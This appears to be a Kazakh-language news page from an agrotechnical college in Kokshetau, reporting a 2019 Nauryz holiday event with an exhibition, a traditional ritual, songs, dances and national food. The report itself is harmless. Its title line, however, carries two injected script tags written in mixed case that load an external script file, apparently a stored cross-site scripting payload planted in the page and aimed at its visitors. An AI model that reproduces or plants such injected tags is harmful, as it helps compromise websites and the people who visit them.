«Қош келдің, әз Наурыз»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.03.2019

    18 наурыз Ұлыстың ұлы күні Наурыз қарсаңында «Көкшетау қаласы, Красный Яр ауылы, №3 агротехникалық колледжі» КММ-нің кітапханасында «Қош келдің, әз Наурыз» атты іс-шара өткізіліп, көрме ұйымдастырылды.  Аталмыш іс-шараға колледж ұстаздары  мен  студенттері қатысты.

       Іс-шараның басты мақсаты өзге ұлт өкілдеріне қазақ халқының ұлы мерекесін дәріптей отыра, Наурыз мейрамы жөнінде түсінік беріп, халқымыздың салт-дәстүрін бойларына дарыту арқылы, шынайылыққа, адамгершілікке, ұлтжандылыққа тәрбиелеу.

       Наурыздың айрықша тәлім-тәрбиелік, үлгі-өнегелік, сән-салтанаттық, мәрт-жомарттық, қадір-қасиеттілік нышан белгілері Өскелең ұрапқ өкілдеріне насихатталды. Іс-шара барысында «Тұсау кесер» рәсімі көрсетіліп,  студенттер мерекелік іс-шарада ән салып, би биледі.Ұлтымыздың ұмыт болған дәстүрлері жастарға кеңінен насихатталды.   Сонымен қатар, ұлттық тағамдар мәзірінен дастархан жайылып, кеш соңында барша жиналғандар  наурыз көжеден дәм татты.

Просмотров: 934


Пікір қосу



Деректерді қолтаңбаға қосу